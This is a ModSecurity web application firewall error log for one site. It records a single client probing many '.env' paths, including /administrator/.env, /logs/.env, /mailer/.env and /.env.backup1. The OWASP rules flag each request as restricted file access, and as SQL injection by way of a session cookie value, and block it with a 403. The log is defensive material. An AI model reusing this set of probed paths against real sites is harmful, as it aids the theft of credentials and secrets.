[Mon May 11 16:33:45.516747 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/en/.env"] [unique_id "agHoyVV4kyjgo4bQBUhXzwAAAM0"]
[Mon May 11 16:33:45.517001 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/en/.env"] [unique_id "agHoyVV4kyjgo4bQBUhXzwAAAM0"]
[Mon May 11 16:33:45.679687 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /administrator/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/administrator/.env"] [unique_id "agHoyVV4kyjgo4bQBUhX0AAAAM0"]
[Mon May 11 16:33:45.680062 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: de12a82ac83c81fe3ccbb9582d3bcb3e||1778511801||1778511441"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/administrator/.env"] [unique_id "agHoyVV4kyjgo4bQBUhX0AAAAM0"]
[Mon May 11 16:33:45.680260 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/administrator/.env"] [unique_id "agHoyVV4kyjgo4bQBUhX0AAAAM0"]
[Mon May 11 16:33:45.680496 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/administrator/.env"] [unique_id "agHoyVV4kyjgo4bQBUhX0AAAAM0"]
[Mon May 11 16:33:45.843298 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /psnlink/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/psnlink/.env"] [unique_id "agHoyVV4kyjgo4bQBUhX0QAAAM0"]
[Mon May 11 16:33:45.843689 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: de12a82ac83c81fe3ccbb9582d3bcb3e||1778511801||1778511441"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/psnlink/.env"] [unique_id "agHoyVV4kyjgo4bQBUhX0QAAAM0"]
[Mon May 11 16:33:45.843873 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/psnlink/.env"] [unique_id "agHoyVV4kyjgo4bQBUhX0QAAAM0"]
[Mon May 11 16:33:45.844133 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/psnlink/.env"] [unique_id "agHoyVV4kyjgo4bQBUhX0QAAAM0"]
[Mon May 11 16:33:46.008055 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /exapi/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/exapi/.env"] [unique_id "agHoylV4kyjgo4bQBUhX0gAAAM0"]
[Mon May 11 16:33:46.008461 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: de12a82ac83c81fe3ccbb9582d3bcb3e||1778511801||1778511441"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/exapi/.env"] [unique_id "agHoylV4kyjgo4bQBUhX0gAAAM0"]
[Mon May 11 16:33:46.008648 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/exapi/.env"] [unique_id "agHoylV4kyjgo4bQBUhX0gAAAM0"]
[Mon May 11 16:33:46.008896 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/exapi/.env"] [unique_id "agHoylV4kyjgo4bQBUhX0gAAAM0"]
[Mon May 11 16:33:46.172703 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /sitemaps/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/sitemaps/.env"] [unique_id "agHoylV4kyjgo4bQBUhX0wAAAM0"]
[Mon May 11 16:33:46.173083 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: de12a82ac83c81fe3ccbb9582d3bcb3e||1778511801||1778511441"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/sitemaps/.env"] [unique_id "agHoylV4kyjgo4bQBUhX0wAAAM0"]
[Mon May 11 16:33:46.173284 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/sitemaps/.env"] [unique_id "agHoylV4kyjgo4bQBUhX0wAAAM0"]
[Mon May 11 16:33:46.173608 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/sitemaps/.env"] [unique_id "agHoylV4kyjgo4bQBUhX0wAAAM0"]
[Mon May 11 16:33:46.336775 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.backup1"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/.env.backup1"] [unique_id "agHoylV4kyjgo4bQBUhX1QAAAM0"]
[Mon May 11 16:33:46.337165 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: de12a82ac83c81fe3ccbb9582d3bcb3e||1778511801||1778511441"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/.env.backup1"] [unique_id "agHoylV4kyjgo4bQBUhX1QAAAM0"]
[Mon May 11 16:33:46.337362 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/.env.backup1"] [unique_id "agHoylV4kyjgo4bQBUhX1QAAAM0"]
[Mon May 11 16:33:46.337613 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/.env.backup1"] [unique_id "agHoylV4kyjgo4bQBUhX1QAAAM0"]
[Mon May 11 16:33:46.505453 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.backup2"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/.env.backup2"] [unique_id "agHoylV4kyjgo4bQBUhX1gAAAM0"]
[Mon May 11 16:33:46.505988 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: de12a82ac83c81fe3ccbb9582d3bcb3e||1778511801||1778511441"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/.env.backup2"] [unique_id "agHoylV4kyjgo4bQBUhX1gAAAM0"]
[Mon May 11 16:33:46.506259 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/.env.backup2"] [unique_id "agHoylV4kyjgo4bQBUhX1gAAAM0"]
[Mon May 11 16:33:46.506619 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/.env.backup2"] [unique_id "agHoylV4kyjgo4bQBUhX1gAAAM0"]
[Mon May 11 16:33:46.669768 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /logs/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/logs/.env"] [unique_id "agHoylV4kyjgo4bQBUhX1wAAAM0"]
[Mon May 11 16:33:46.670330 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: de12a82ac83c81fe3ccbb9582d3bcb3e||1778511801||1778511441"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/logs/.env"] [unique_id "agHoylV4kyjgo4bQBUhX1wAAAM0"]
[Mon May 11 16:33:46.670615 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/logs/.env"] [unique_id "agHoylV4kyjgo4bQBUhX1wAAAM0"]
[Mon May 11 16:33:46.670954 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/logs/.env"] [unique_id "agHoylV4kyjgo4bQBUhX1wAAAM0"]
[Mon May 11 16:33:46.929880 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /cache/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/cache/.env"] [unique_id "agHoylV4kyjgo4bQBUhX2AAAAM0"]
[Mon May 11 16:33:46.930280 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: de12a82ac83c81fe3ccbb9582d3bcb3e||1778511801||1778511441"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/cache/.env"] [unique_id "agHoylV4kyjgo4bQBUhX2AAAAM0"]
[Mon May 11 16:33:46.930467 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/cache/.env"] [unique_id "agHoylV4kyjgo4bQBUhX2AAAAM0"]
[Mon May 11 16:33:46.930715 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/cache/.env"] [unique_id "agHoylV4kyjgo4bQBUhX2AAAAM0"]
[Mon May 11 16:33:47.094417 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /mailer/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/mailer/.env"] [unique_id "agHoy1V4kyjgo4bQBUhX2QAAAM0"]
[Mon May 11 16:33:47.094789 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: de12a82ac83c81fe3ccbb9582d3bcb3e||1778511801||1778511441"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/mailer/.env"] [unique_id "agHoy1V4kyjgo4bQBUhX2QAAAM0"]
